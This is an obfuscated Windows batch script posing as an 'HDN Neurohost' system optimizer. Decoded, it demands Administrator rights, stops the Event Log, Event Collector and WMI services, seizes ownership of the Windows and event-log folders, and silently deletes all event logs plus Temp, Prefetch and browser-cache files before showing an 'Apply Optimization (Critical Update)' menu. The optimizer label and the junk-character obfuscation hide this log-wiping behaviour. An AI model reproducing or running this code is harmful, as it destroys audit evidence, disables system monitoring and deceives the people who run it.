::obfuscated by https://github.com/hdnrahul
@%DDsbadhXG%e%NoVKKtAC%c%iQaN%h%DI%o%XhXDlDdek% %QxsGBdvJkd%o%PqE%f%VWjIqx%f%hqm%

t%eSb%i%qvqdnnaw%t%xagP%l%N%e%IPP% %sLD%H%DSVvrZm%D%rWgu%N%gTUX% %nINmBEvk%N%G%e%fk%u%wjtPCWc%r%xOVskrbKmR%o%qFOj%h%yBn%o%pJUnlf%s%nQzSJtq%t%qyUDAZEt% %idUwQK%M%EsEY%o%hCuX%d%FviI%u%jW%l%LCB%e%jFAtWdhG% %QQ%-%zrudSpd% %YioIIh%C%dnvA%l%VE%e%JnhA%a%Uh%r%WCFamyzU% %vPwmi%L%ZOxWvf%o%ClNYbRurN%g%awPoeHY%s%EkjClk% %yfynbyFZR%a%Ggz%n%v%d%kXSOcma% %dFxa%O%cRgy%p%WfVLAj%t%FCFPMGw%i%AiuLICO%m%GTMSYvzE%i%SwQcJoNdoC%z%tRXnlhFo%e%H% %FxCVBbl%S%b%y%l%s%GEDyHotfdm%t%hBqkgOCdt%e%yeNGqM%m%NXygadzc%
c%AsCMuFM%l%ppyVQmJTo%s%Tu%

:: Copyright and Info
:%UJRaZmGf%:%uVdiXG% %ualDH%C%rVqldFtn%o%LxgXt%p%I%y%kpxIyN%r%JlUGbQSnQE%i%eJmQYPyBRF%g%djzK%h%NavNUxkpHN%t%dNRLXJ% %UYZ%a%lcr%n%as%d%atQdwYAx% %oMWSv%I%MLdoBmFos%n%fc%f%Xux%o%OuBUqekvI%
e%gXRqR%c%HsFH%h%bm%o%fSeX% %HBG%=%bHAoVoF%=%r%=%RvLfRy%=%mOJOqUEkN%=%CnodTZzv%=%cZM%=%gYgHiKX%=%AACWGhavQ%=%CFQCCcHMBP%=%nIBIX%=%emkg%=%ygPcma%=%Zwdq%=%EXxfAiKCNE%=%kJIHHZPwT%=%TD%=%TGWRdYIV%=%PwuAfJ%=%dzZkESRTGU%=%OXN%=%QWGbMqg%=%fiPjTzWYq%=%f%=%rUgSh%=%p%=%olwXnAl%=%lZlDj%=%uqUBMN%=%jmLHIzPMYx%=%iNhqd%=%IqeDqSOu%=%fbnPnVvI%
e%uaH%c%YU%h%BT%o%yusD% %Hw% %d% %ezPcTY% %lrricEo% %RuySmST% %Mjc%H%YyGvjacyZ%D%hQ%N%jjg% %MhvjS%R%e%a%RGGgC%h%qgypsVne%u%vvdEcgsd%l%qiYxEme% %xCPqIZsr%N%jaQx%e%bSfyYUVoeB%u%ujd%r%bPDukEu%o%vutMmRTtm%h%OYpXbLjI%o%KTZnyQ%s%njS%t%jRmjlFZpGb% %A%M%pUf%o%vtruiX%d%RZgt%u%sgTEpW%l%jjx%e%MjYt%
e%YwLUJb%c%cqTS%h%UXVUETopoA%o%hiCA% %afS%=%i%=%TNjYn%=%uIg%=%yIuPcpaxM%=%Tnkroax%=%dOI%=%aapTFPN%=%jfg%=%R%=%rhNC%=%ixThyO%=%noYba%=%w%=%MaMnMrS%=%e%=%sOoy%=%sfQMMoDBpU%=%qKPl%=%X%=%qvi%=%wfrHTIVD%=%vgjUsbOy%=%PhN%=%IbsvGGP%=%xhfaby%=%UYHArfadv%=%XCjJsxdNe%=%oxMQAV%=%mKhFz%=%W%=%HBuOxA%=%fscOxFBOmB%
e%RYiqBu%c%QqcvT%h%patfmoiq%o%nHjo% %zvFOqmosRX%C%wWJDt%o%CpfBiHXR%p%NFM%y%mmJNEGLKqt%r%BUTbFLQYJB%i%gWND%g%gNpltmok%h%aHBy%t%tnYmSzbtN% %SwAz%(%Eut%c%QD%)%L% %aPzlIo%2%FkWbbLbPUP%0%gb%2%M%5%yduxj% %kwdWNhHQWT%R%CGzzkar%a%pHGUIpkzNo%h%UsQxVmiX%u%nsOjcZ%l%EFBTTtST%.%qgmWaz% %ImVzNJqt%A%DIn%l%keAGdkG%l%QOYWSHEUYx% %PCMXYTc%R%u%i%qxivtjWc%g%naFJIUDywA%h%ksOLaZqQ%t%DaHE%s%iAQ% %nMZ%R%chTD%e%uNAVtx%s%QRVztmKhyJ%e%sixcpvhfhT%r%yHu%v%W%e%QFGNId%d%oWhYFfzXx%.%bMBakRX%
e%CqkAEO%c%QC%h%VCuDfrsF%o%JbRKw% %v%M%ANQwwqEm%a%o%d%JnsVjDXNz%e%ocO% %sOhQEx%b%YPbHHC%y%P% %CI%R%vBf%a%bLF%h%C%u%LoUSb%l%uGo%.%rBlXL%
e%NhzcT%c%S%h%uBa%o%XKyFEzALB% %y%=%JZOZxcCpe%=%hEn%=%NotMrmAYEb%=%PPCfEp%=%RBSl%=%s%=%EeRiLcMoUg%=%LcMSmoT%=%lBmp%=%VwnQfzOxJ%=%cKsrgc%=%UVnRHEfF%=%fOmwGA%=%z%=%m%=%xu%=%Vgn%=%UpjbuCLjm%=%vitQpZJ%=%amrkCgje%=%kNtGpgzq%=%dLyKj%=%qOZWwN%=%sqqMscN%=%JF%=%yIg%=%J%=%MFpzHja%=%neI%=%XgyG%=%wG%=%bKTUHct%
e%MapNXqVi%c%mjxL%h%z%o%fvzdYE% %zA%P%zyjNFLAm%l%XlqnC%e%Y%a%ijy%s%dZKCFfSV%e%T% %SanQloy%r%gU%e%fJa%a%wrBjsln%d%lyyeD% %Wnh%t%MwQ%h%ozH%e%xFnVw% %dsaniZIG%i%ZqUaf%n%sgkqKB%s%t%t%StAm%r%fl%u%aSWQ%c%OTIKURSd%t%T%i%oakRGhE%o%BunV%n%Haf%s%UAeN% %ByZi%c%kQ%a%XdBxWgLHGb%r%lPU%e%L%f%Fpl%u%PHQRmAKUf%l%ValHrxyFIB%l%iRvzGf%y%fhKUJFG% %KUVxUGR%b%VAiOesBvvP%e%rDYcNsdl%f%aeUNW%o%hT%r%hzs%e%ClQJIhsOG% %nCPrz%p%oRqOSrux%r%loskNYC%o%aMPbPmgIqJ%c%aD%e%J%e%REHVnBsjIV%d%WAktoumuJ%i%ZHOyOK%n%VPZP%g%Wozuokvo%.%aAsNHS%
e%mFR%c%ydyoHzWb%h%RuFxCsix%o%KB% %UT%=%RFtqxByy%=%eGaSNnh%=%dGn%=%pdeae%=%cSJcv%=%a%=%o%=%EmWwb%=%icKpymVGcE%=%AqtwA%=%Mkhjv%=%fK%=%tHK%=%fnubcEY%=%PeEFz%=%vhRMbHiID%=%v%=%KIkFssc%=%vUKlRiX%=%HvoXxByT%=%YILup%=%KGlr%=%FgAz%=%ynoJmLlcF%=%a%=%wrpcuvYZg%=%Y%=%UvBwxlLIft%=%FPCgrYJGW%=%PR%=%WUwkvPeqHJ%=%La%
p%mNfUjvGek%a%jdNEDEka%u%P%s%mOUprOi%e%zJraGHo%

:: Ensure script runs as Administrator
:%PYlhY%:%iWFSM% %NP%E%NXqhUdQj%n%HNMlED%s%UANVWjoSy%u%MzHEah%r%SulY%e%EDMYW% %xbqLy%s%UPZJ%c%LJNIPNgOX%r%ckJkIc%i%zrOB%p%rWREmr%t%kbFAcInsQO% %fceePfPz%r%TgxKSgl%u%qlGsmPF%n%E%s%p% %wVEs%a%cJrQHhxm%s%TWoG% %uysNXoGnM%A%xznrbat%d%cxHToPh%m%IQai%i%sJp%n%tXEqyTqQN%i%duI%s%PWC%t%odXBYcqKR%r%qWL%a%EsH%t%YNFMJS%o%AR%r%wlsjon%
N%WvxvxHRGRx%E%kE%T%thWrVPBZmJ% %wQBVTfCF%S%ZFgmokrKG%E%I%S%iTrj%S%gChjqDC%I%vKEZfpJ%O%GHRn%N%dXvAHEAnKf% %WpZYmmHy%>%Pzh%n%EqcaxcIw%u%KoFficff%l%EAV% %XGmneLaQw%2%nvfpgy%>%QmLDlpOAIC%&%eyuXcI%1%uBpqS%
I%fjoEcPtSx%F%LEaRBkrH% %CrDv%%ERRORLEVEL% %nGOAFJUq%N%DhdZuRh%E%WhrXfkJnz%Q%XaET% %gtOzxNv%0%gAmTigajD% %cmAJYm%(%HOgdYbJGjH%
 %HpXJLwrZ% %eHAeFZBVUx% %fuNfmOf% %KBoQeCskNj%e%UoSMTm%c%RiZBh%h%kkVWT%o%ftY% %yLdAy%P%eAudodHjHD%l%ah%e%p%a%QD%s%bijA%e%JghL% %UESoH%r%ieeuob%u%VW%n%bCsXTlOFb% %JIJSMlVMjt%t%KwjBoVEKEY%h%rLypNYBL%i%hFGu%s%gUmefiMX% %DNc%s%AweRUBn%c%VntQ%r%IHKxk%i%mb%p%VJL%t%YiSWnZF% %i%a%orY%s%EoyePpvhnv% %rjiKOBDAz%A%HD%d%PHhbTlie%m%aLsNPe%i%Guk%n%PwUF%i%jXBAvkzKPQ%s%ePnWicR%t%zs%r%fadHoae%a%j%t%mNmccv%o%nbAi%r%oifoeayTjd%!%ehNe%
 %iPyxen% %RXoe% %p% %hTNOiFJ%p%LbFVhTXQU%a%jiJ%u%oDJGIiySew%s%SREXubrPgm%e%zlKE%
 %u% %jOhVfp% %wDBmv% %qMLqWhOpDI%e%cHQVZz%x%LdzLrf%i%LrfVoMuCEq%t%hD%
)%iLWkm%

e%y%c%CMhzJ%h%dU%o%R% %cFi%S%h%t%chgNeME%o%nySKFqlea%p%iZjPZZkfjB%p%CZVxc%i%aPbo%n%W%g%GszPnkvP% %WcIbQlG%W%c%i%VZQnU%n%u%d%IG%o%nluquJ%w%cHWgmquNO%s%txNbvEizj% %BOGilu%L%PXHhKiBG%o%KF%g%XBiK%g%ORyMcmQ%i%AEblzJo%n%m%g%Ax% %GmCRn%S%Q%e%Ahuf%r%LfhmgZ%v%kktrhryL%i%DZR%c%GhmGqA%e%termRvy%s%Ictntgyeu%.%TWTOruX%.%xVZawWlII%.%PQ%
n%WBVAsmJ%e%p%t%WgW% %UwuWH%s%EairPTbcaA%t%yDlsaY%o%vqSS%p%UpUVsfdTBw% %BwbP%"%VtvAUMV%E%ImCpx%v%qofYgNXsXf%e%ETHGx%n%MEQIFnrD%t%H%L%cuZYcxC%o%L%g%xDz%"%gvadHaLtXI% %XDwh%/%yMRBCQd%y%N% %lhX%>%GrDhETMie%n%qBO%u%DoBx%l%uwVnZPoU% %JY%2%sm%>%XRSwMr%&%M%1%TjAeEsfLK%
n%rUcirWYm%e%EFAXbpBlx%t%jXBHqJb% %s%s%YvWwjSCdL%t%bHqfy%o%rwBggVWyX%p%gfra% %JIDrBN%"%CKirQgZo%W%QgAQx%e%SRDdSpO%c%dgnfxBJ%s%o%v%QiJr%c%blAcv%"%vtFxawpX% %kmCyPSDBV%/%byTqKuiiow%y%IcRNLETiXt% %huZgXU%>%A%n%AXNDmUyrpp%u%OnxsfrcRwX%l%yVcwJBPtyD% %iJQzqKxwQY%2%KPzJSbnqte%>%vEa%&%raipKQzA%1%bEQWdD%
n%mZztnpbah%e%Zsw%t%nhAdImXi% %MxlWNoEt%s%MSdsltEu%t%PNZEo%o%ZXH%p%zDhjnPok% %YE%"%yrXaysMxJc%W%hUuqyeUpzo%i%INfYRWOppj%n%lsi%m%HPvCEEC%g%m%m%e%t%JeLILNd%"%sh% %D%/%llnT%y%L% %Y%>%viW%n%OWCM%u%yhmJ%l%LSj% %JBlYBn%2%Ni%>%mVYdVvi%&%vqa%1%g%

e%RyMGG%c%YRfSxMtdoF%h%lhlDER%o%LqND% %ETE%T%DgXGbgQmlg%a%uqwca%k%GzjvMykwd%i%htfqu%n%lApqZgGAKJ%g%DF% %gEfyHSw%O%RZh%w%bS%n%cZaNLbjraQ%e%UfUpVXdEl%r%MjDMVVIF%s%ZXEsfZuWj%h%Tlqw%i%IaT%p%bgs% %zdvVmRs%o%ChpycYFVqc%f%S% %oHDrnXLd%L%V%o%IqjfHrMzPl%g%wMgjrKKK% %rRwkPCSFh%F%UgUyiewS%i%BrTtyGhBB%l%OgDDP%e%igY%s%BBhaJuWNt%.%XWiZgtejbr%.%JgJcV%.%jZnR%
t%L%a%BPQrrd%k%jUmDvH%e%XjGx%o%LFGrW%w%MXrhQB%n%MQg% %mCLParukSW%/%YocONYkdv%f%hvccprtXTy% %vJqEDggqE%"%DcTt%%WinDir%\%mldxNzue%L%XORAIeCHG%o%iNnTx%g%bSbRu%s%WXRT%"%VJVvo% %B%/%fuuRbHIgTA%r%hlTBWNWdh% %Ryc%/%Pyk%d%tnbEnhOZN% %YUfX%y%VdYmOw% %sIuJmsI%>%vHNrVX%n%IRIrAH%u%FvcSdyAW%l%Hq% %dp%2%cft%>%cSI%&%ODpmpmA%1%yPGrIiX%
icacls "%WinDir%\Logs" /grant Administrators:F /t /c /q >nul 2>&1
i%Tc%c%LSAvk%a%dZIG%c%C%l%rWCtIoQXn%s%z% %WB%"%IBNqpE%%WinDir%\%HxUsky%L%AE%o%CfT%g%mdIf%s%hz%"%tSMDGbysqw% %P%/%gZr%g%ZCOOHUMeQP%r%cIpU%a%X%n%EViOuriF%t%rGd% %qHWTbRDwB%A%YxNJEM%d%oCMrhp%m%bWHipVoTE%i%lIsahHXmvO%n%hg%i%VqNPHt%s%lbwCM%t%NuvlgwBdPE%r%mUpfiOKMf%a%aEvuMOYsC%t%mrFWHl%o%xJpSw%r%TrsPLE%s%oLXCXpy%:%kQw%F%rFkkytZ% %QohtBzDR%/%dttOL%t%mXMSdpBuQ% %GKCxTPD%/%GvgbrYwOq%c%accV% %DpeEDiYYzJ%/%xUl%q%hmgZUStCBy% %HcEFyVnv%>%dMpMBqVM%n%zIeYQYN%u%FKvW%l%RIdWa% %gdvQaIsT%2%oJk%>%nurxiup%&%rcnyG%1%hOQyT%
t%TCc%a%RWShqc%k%BhJyj%e%lpU%o%UltedCZxN%w%kEfI%n%voyzDMA% %XoXaytd%/%pcNZm%f%OkuHi% %kqMMJ%"%qqeIlJ%%SystemRoot%\%lk%S%kPKjlr%y%gWLzHarm%s%Om%t%HrgtxVR%e%L%m%WJM%3%Dgkun%2%UYbH%\%TAKcK%w%Egtqd%i%IiTkhneT%n%OEah%e%KOhx%v%GTiJMUOCGD%t%Y%\%PIViye%L%GCWvaPsO%o%uKYChawkD%g%EQL%s%LPVaLhF%"%K% %Odk%/%bzqXJOs%r%HbDfdIApl% %t%/%v%d%AXKDScaaj% %EMEd%y%VhH% %wOoZzLyM%>%KsaHc%n%tIBtLgf%u%YDloMRZVm%l%MjpdQmGB% %nUBzM%2%aZqLSZyiH%>%JXq%&%ltwx%1%PYg%
icacls "%SystemRoot%\System32\winevt\Logs" /grant Administrators:F /t /c /q >nul 2>&1
i%A%c%XR%a%ZvEc%c%KAhiThyzU%l%sHtoTaUN%s%CUFHtZId% %QnM%"%rGoFRWCWbu%%SystemRoot%\%r%S%yTLr%y%wgnoSfZ%s%aLn%t%y%e%owmYQAW%m%GfjjWJJy%3%KZmF%2%HwCgkiNMt%\%vqM%w%R%i%LbWOuC%n%Ie%e%HbLvjsHR%v%UJTXkrE%t%eXBWFwl%\%mAZfzG%L%XWVjuuMeal%o%L%g%raMSK%s%rNPLMKfu%"%GR% %b%/%x%g%vtPkMCDL%r%LDYpBoLl%a%uJclV%n%FRLqAd%t%UuhVhUa% %ZMWBqt%A%wYIwu%d%FYw%m%whgti%i%rPfPhGJNu%n%crZg%i%wfMoSK%s%g%t%RBEltniRzj%r%bWbgObQ%a%iEBLQPIg%t%XSYIjsidk%o%GoFqOUF%r%zjlhWS%s%kHtnt%:%ulbfvLX%F%XJFIagwuat% %G%/%cbhHjwr%t%oQyHndhieo% %VVxk%/%yraYJ%c%ydZyXMdEVd% %D%/%AjVx%q%Ki% %ecWrnE%>%gMEBLYEEZ%n%mTVwXHUUYs%u%foRSkT%l%EaSFN% %vl%2%KQHhEYGP%>%CtLcVmRbK%&%PPWW%1%RT%

e%finkYm%c%EVkFH%h%aWvpksrlq%o%f% %uiS%D%KIxYbRxxq%e%sTDVujUBk%l%JtVej%e%Bklj%t%fwotOb%i%AKjVR%n%MUX%g%bokCXIdJ% %KSYjdLcLSg%A%hLmmONClG%L%MAvvF%L%It% %yfAIUQk%L%khB%o%KtwvbRTiDZ%g%CLA%s%fp% %iJn%(%q%T%Sl%h%Rzu%i%qPUmaIQdxu%s%UloHOj% %KBIpADh%i%MhgPSjsAX%s%oiZGKNKcXS% %qS%a%h% %erbTfVXkFd%p%Rv%r%GFmA%e%Ba%-%z%s%fIss%t%wic%e%rEk%p%DnT%,%AHJG% %yEySHFtOtD%c%wcv%l%YCohFl%e%imsrRTZ%a%vXc%n%qMRsr%u%lSTsWa%p%KKSjri% %QZG%a%dvVxwvmxAA%f%xVMwnj%t%UZEj%e%XdeC%r%FxdKMIV% %ujxWSG%p%noB%r%eLutnKv%o%GtcEmupuAt%c%W%e%IUIEEFed%s%qTMT%s%vV% %Uxr%w%YyTnLj%i%pjpB%l%Xh%l%nJlF% %nfVT%h%ET%a%JKNPmhAAB%p%KPP%p%CbGePqXuK%e%C%n%yM% %ueUwWJTq%l%bkoAVgczFm%a%OIaJa%t%RyRviLncdl%e%QqpKYnC%r%dzhGjjvYhr%)%dLDQirXNmZ%.%TVXbNreNPn%.%PNIjDglb%.%bOBpo%
:: Deleting logs (temporary, to clear any existing logs that might be relevant before starting the optimization process)
:%fOJH%:%tVVz% %ko%D%mkJBKLk%e%TnSgBKBd%l%yt%e%bZMrWPa%t%PeHoGj%i%ckgkcD%n%m%g%vd% %CvDwI%l%S%o%MaWcr%g%A%s%W% %ttHSyPnXso%(%BKyjjK%t%MGiUimwsg%e%hsb%m%Q%p%JUIIItT%o%sUqZ%r%UfVsD%a%ZNb%r%O%y%xgO%,%yT% %WloLm%t%M%o%FwaZ% %YUbO%c%YMVkkk%l%l%e%MMYvAQy%a%cS%r%KFFn% %H%a%JvXJ%n%UCKF%y%VLj% %I%e%mfKdCaa%x%kV%i%CoSWx%s%Hz%t%d%i%o%n%ASH%g%MaRIpR% %JAwRfcRuTX%l%xgjAubO%o%OqT%g%bJASOvRA%s%jHeuMVGra% %VfEhaSVyon%t%kVKIzdyWIN%h%GoZdfQZ%a%yX%t%Gdd% %MfjvMQE%m%vrf%i%zWXUxFcn%g%Lhnunoq%h%Nbnvdu%t%yIcDEAXpgD% %hTBODTTgD%b%ikMLXByEr%e%vMmH% %SjiGmBvUye%r%WSs%e%XcPruxmywC%l%oKdoIddhK%e%Zsd%v%KoA%a%C%n%xn%t%NZb% %hNyvc%b%wdjrO%e%bWKeiS%f%AptREuYLer%o%pSslYagHR%r%abPG%e%uTcMOGHFQ% %t%s%RvW%t%ZilnRS%a%krea%r%kbo%t%SBQNztpZdh%i%QXxgp%n%btz%g%vKIuwuWvdr% %gwLHYk%t%vsmPL%h%rMKnqHWnG%e%LKXktDA% %vlzlpzI%o%uWkVXbNb%p%kLqIlamb%t%SQ%i%vBUZNx%m%opx%i%Mu%z%rwWRXMPRd%a%lEGmEdW%t%Wm%i%BnLNCQuFlQ%o%qARFp%n%LIdU% %Qkw%p%mnoJiylfY%r%BeZgxwKS%o%kKvAqEn%c%mTEqOuOnc%e%hUyyzG%s%Q%s%DhTQI%)%BzejQFj%
d%ZsKHkgliF%e%e%l%idMA% %WuJISyhg%/%XRnnw%s%dCNqWQn% %RvxhKyox%/%Osexq%f%EXyiWG% %YRepHnph%/%hgdlUINOO%q%ED% %BzqPYYWj%"%JdUSNTigc%%WinDir%\%mO%L%RmMBTOOpD%o%UoSDLZk%g%DNMidsrLiV%s%MjKpcYEv%\%xAJhhkqK%*%fnKPcF%"%Ib% %xBVh%>%h%n%EWuqNp%u%Wk%l%KQPwg% %e%2%xVoG%>%guGv%&%N%1%KmtJaiw%
d%Thisesu%e%KE%l%upkRvhfu% %CwQpcE%/%BwLZGUY%s%s% %XEwOUafh%/%W%f%rPgDcwZGlA% %trXJf%/%OuvdnCZil%q%lneUEZPihv% %u%"%hHKBExkCao%%SystemRoot%\%Vvuu%S%R%y%NYzRz%s%xz%t%cOFbPW%e%hi%m%BeP%3%gsQF%2%iT%\%me%w%L%i%zoAXfkpDAQ%n%grRBXkKLR%e%ai%v%IEyCk%t%EzTcdrQ%\%TpEL%L%UpYSTcnZfp%o%C%g%ClbbegsEC%s%GALna%\%SEwxppqiob%*%kmSzUZcpY%"%HLKvWUkljX% %B%>%rfxa%n%fluBcyYu%u%B%l%gPdrqbdbo% %kOnvMqgr%2%zqXFGCJeg%>%NtIQZniTY%&%uPkZteW%1%lAxsBwM%
d%h%e%gj%l%JuOE% %vDz%/%BfPoDDnLHx%s%SfnqeXtMZw% %bzvLHZ%/%Twqk%f%V% %YYr%/%JSM%q%q% %WcAWyp%"%wLkzNN%%LocalAppData%\%b%T%cvVidoKY%e%am%m%GXy%p%Q%\%cSvKFU%*%k%"%rDsdmWH% %vrDnlZvS%>%DvqwYYzi%n%d%u%OwhWYsZNv%l%kFaJWfqwg% %WP%2%UgxRKHpL%>%JKgPWPq%&%TgRPM%1%g%
d%R%e%igSaaAdDp%l%GyI% %yHiLaLe%/%aK%s%cya% %aIycbOzC%/%FZiJKm%f%KNwQRbo% %wO%/%rsNgMDmNg%q%XkrlyxSWf% %Dlu%"%ueNiIZc%%Temp%\%hNiPtT%*%dnk%"%tMr% %aujyjp%>%VJurlO%n%OvfkYSNyI%u%ThnmW%l%GmfUMoaHT% %l%2%DWPUJKl%>%VsWf%&%IUSrhSV%1%FHxInLFzpk%
d%subC%e%HTgycNfJo%l%obsMjVVO% %fVGJFlhC%/%aRIfGvGWd%s%sivSgdZR% %Myqgp%/%HX%f%r% %XWye%/%D%q%TRhyYUFThV% %mlsbne%"%pEf%%WinDir%\%bmlkYRttNH%T%rgYVTjQWeA%e%EcCot%m%naCL%p%GMntthI%\%NsUbcD%*%YtBrBEC%"%hwyAmqdjT% %PqBidVN%>%FJ%n%PYisjOZj%u%UkLvZtwaA%l%yeSuY% %Khwxu%2%VRhp%>%Sn%&%NGWaV%1%B%
d%jspeQUb%e%efPTLhnI%l%KFAGlv% %S%/%afgRXXRZ%s%LTiJOGL% %igbHHIqHg%/%rNoSy%f%TPo% %gpC%/%oLbL%q%caxHxA% %izlsgxOtx%"%KhkNZ%%SystemRoot%\%j%P%tEtMjoa%r%yDE%e%vcpPVCmhkA%f%GCEb%e%PDvwh%t%iEzSXXYec%c%zXWGMrrsve%h%BKIjI%\%lpeiGE%*%wzTxMa%"%pGcVlboVJR% %iDVlTv%>%rlXedqOwj%n%okvFs%u%iGazazM%l%vMMKLzwb% %p%2%EasohsNLrd%>%DGZeWmQolS%&%sUEBuuNJ%1%gRXL%
d%Q%e%o%l%RSDPZmMht% %UQiZKDDfhg%/%aMsUKFwSlX%s%FpzTqmmRp% %KWdxSOvV%/%sY%f%I% %nCXRarvQ%/%hzbhWYfTkj%q%dFs% %bEnYH%"%u%%LocalAppData%\%jC%M%WvrpbQvxQb%i%DXT%c%d%r%bwJLbZX%o%Gvrz%s%MMvI%o%kGyNUqsN%f%GCzhZM%t%BJxjqauBfG%\%HUXwDHEV%W%yNAAYBg%i%A%n%DZUo%d%TjtRa%o%uTTw%w%HnqOv%s%CVCdqpi%\%KpIQYLGHaU%I%rwaLsVvwJ%N%qvF%e%MNXUlROTmY%t%PwXhSdCNlv%C%loRWmF%a%glMQzJVH%c%tsrhFe%h%ZEHxqyxq%e%iqAvXo%\%xgxA%*%oyYTd%"%b% %JyoaScy%>%wmGsIUZJrq%n%WOyYhQC%u%TtLnjETkqd%l%HhmpWswc% %YM%2%mtsSim%>%gNJhlvS%&%vmrK%1%aTqf%

:: Main Menu
:%EYcY%:%AWalSLPWwQ% %vANb%M%vrzLGtBsg%a%UXszfVVW%i%YGP%n%kyabsx% %fdHw%M%MORm%e%eqY%n%kflqMIRZ%u%uLRMa%
c%uE%l%yTzkX%s%FIb%
e%ygvDiW%c%s%h%PZ%o%JNhUDxEkL% %sOsizip%=%I%=%COEBScQ%=%gUx%=%ZwshyD%=%CNEBFtFiMt%=%GRmLzyXAKT%=%rvGb%=%AX%=%ajDxEJQa%=%pVHBpZOt%=%wxKF%=%vHK%=%M%=%JbfyXRE%=%CMyxa%=%tvlZ%=%MfbqibeDWf%=%dZgasGTp%=%eusiwP%=%SJ%=%hybOJbtzG%=%KuICum%=%Xwo%=%OIMDqW%=%mZfUFtgqI%=%fmk%=%DmQySICigs%=%LRv%=%Mgdl%=%ZQOio%=%OSGcnjaMu%=%K%
e%dzENDWb%c%FU%h%lA%o%hRQo% %Aw% %RLoHsGgx% %PixvJYRy% %fKZUNYDxYV% %UUckQsVF% %Ays% %kLAUTBj%H%sUxULuapdK%D%g%N%CPrhWoyrT% %syOxLs%N%SCaW%e%BZwWLDzDP%u%kvuDqD%r%O%o%qWDmI%h%k%o%LYTdkV%s%aNGVpv%t%NdplWFRL% %nNoP%M%GXWdCBsGG%o%nGBtif%d%okNXkPh%u%bhGuf%l%y%e%NHICjNRWb%
e%l%c%YxaPCOTLu%h%HrqVvVhkBM%o%yPkMEUEIFC% %eLF%=%OJC%=%BCLn%=%JvtyTSLI%=%QkxnOZQ%=%FQKjGB%=%cpi%=%ehoK%=%dVvIbx%=%fTWeywYPGD%=%CldfU%=%dZitb%=%DDhsS%=%EUWtbkE%=%r%=%shvpdLxdZ%=%vvXYOl%=%hsi%=%If%=%zLBG%=%AktNySZCQe%=%vkK%=%CGPNhoOS%=%rT%=%TLoUrMx%=%z%=%eEkUHxEk%=%gK%=%AWuYCg%=%kSudAVo%=%AeBgmY%=%CiTZxSd%=%w%
echo WARNING: Optimization process will now apply critical system-level changes!
e%juddqoRut%c%m%h%xMU%o%heggf% %ldJkaw%W%FwSS%A%ZPgSTTku%R%VDGKAuOC%N%Gw%I%iaCH%N%P%G%fEDUDdmWaZ%:%MfNrjIowmc% %mlsOUdX%O%apAuDRMYv%p%An%t%KGHG%i%GasKFiXGS%m%sgAODFJcq%i%AlPL%z%yDxnJkcuvi%a%bmhG%t%TmqIU%i%WAf%o%Bgz%n%sKUHrTfRp% %Xfdu%p%Hl%r%Zrhtmdid%o%NfbejyRvsM%c%D%e%NIEMzVr%s%jdLNIdFGVa%s%iss% %yzV%w%ifobcND%i%BeLPzjFxg%l%JgqVPyV%l%wdIgGF% %RMM%n%ma%o%Lz%w%MFOH% %mGzoiB%a%mcGKbMmz%p%nbpc%p%trifbK%l%kIy%y%T% %ahYP%c%lS%r%VdDwrG%i%bglLrVhyKq%t%jZghw%i%CnNbG%c%FkWLYOhCQR%a%OAHgvhi%l%eQCSiJaTGS% %WYWTZ%s%SV%y%hQGQ%s%Cw%t%eIOV%e%ZiQENNDdtd%m%KwCcJOZKL%-%wo%l%d%e%cWMhq%v%v%e%eAMXFnKyx%l%MARmDSr% %bvXubIkcFI%c%N%h%Phl%a%aaXJCgxh%n%nipbVRj%g%YHalar%e%ek%s%BmKXhZe%!%QJ%
e%lHiduEH%c%r%h%ax%o%lWxFveQh% %ASrzblJX%D%b%o%ZlQtIz% %zeyBjTKppG%n%gQvdAtA%o%E%t%RDMYS% %au%i%aIlT%n%QBwaGJ%t%Pfbl%e%kqXkXNt%r%y%r%wxVTkRg%u%vzQOuQROjh%p%PqtD%t%TfunIZU% %zALMremSN%t%RPkb%h%btbiR%e%fZamfkp% %S%p%To%r%d%o%eCgphUCGd%c%hwcnZZn%e%vCEOW%s%UjBPW%s%ZNO%.%OXPZotPMw% %ptEdDRzFVb%T%Vr%h%gPDk%i%EqpZoDptJS%s%sZZMjcgT% %DVmsOuyFcD%i%hbxVacS%s%kRGVMw% %ouNsibVJ%f%SWcWuF%o%LbcLy%r%fYcgUGDjK% %WvJuzuxxY%o%YpjuCJld%p%MaWOHeBQMw%t%IVgH%i%lDlCGFfh%m%VInkqvUUEY%i%jrLKWp%z%Oa%a%vIuc%t%WLkKPWEofp%i%kvBwSJIu%o%O%n%QCVWbEBgo% %PkmKT%p%rnSPI%u%ARxcfdtyY%r%ryzgGk%p%BnlkYsK%o%lDq%s%hyCCXIUeBS%e%jtEMKz%s%ZSSdOJ% %hGSZLN%o%jchMAvYSxv%n%nBFlCjEMMK%l%dvSwHvc%y%snaNp%.%xxynWlEFXk%
e%QrQm%c%Spnkzwu%h%JinRdTXxGR%o%b% %y%=%oGtLsHI%=%berN%=%fPyYkiS%=%PUNeES%=%wlgGYw%=%ZN%=%YTgTSaTn%=%onoPgRBPq%=%CGc%=%oIEK%=%GFS%=%sammn%=%yYkhu%=%RuSLKow%=%Cwnw%=%qzoCLyrM%=%v%=%I%=%DHpgznkm%=%u%=%HhkILmQvM%=%DYAJ%=%TQe%=%M%=%euIOmXUIIF%=%ZStIRCp%=%LcYg%=%B%=%BigMWvOHV%=%R%=%cIiZcWJ%=%BwWIZcRPEs%
e%Mf%c%qD%h%SL%o%BSW% %wDDOqr%1%ytcPZr%.%Z% %C%A%kQPMzDJ%p%aWS%p%OCeHJ%l%IvmC%y%Cwk% %GbbcZ%O%MdkRFEijca%p%D%t%VjlTgcB%i%bNvkyOSh%m%DWncdrrdmT%i%YVmOApW%z%Eo%a%CKDnWMr%t%NPMhKR%i%Mp%o%gtpIcoAvD%n%hwNKKq% %SsNxOdm%(%XTfDCssj%C%g%r%w%i%L%t%olxmGki%i%xfBJ%c%g%a%uaAeDvrXBV%l%zM% %crh%U%xY%p%SkKTiJnWMU%d%dJXak%a%IXUZwsQDv%t%HKvaC%e%XPLKXcEohL%)%ETLAqtY%
e%qmbsvAnP%c%n%h%eNF%o%pBu% %P%2%jgk%.%cWphEsTCrw% %kIOiv%E%CRUci%x%k%i%bKFUd%t%pkwRxCW%
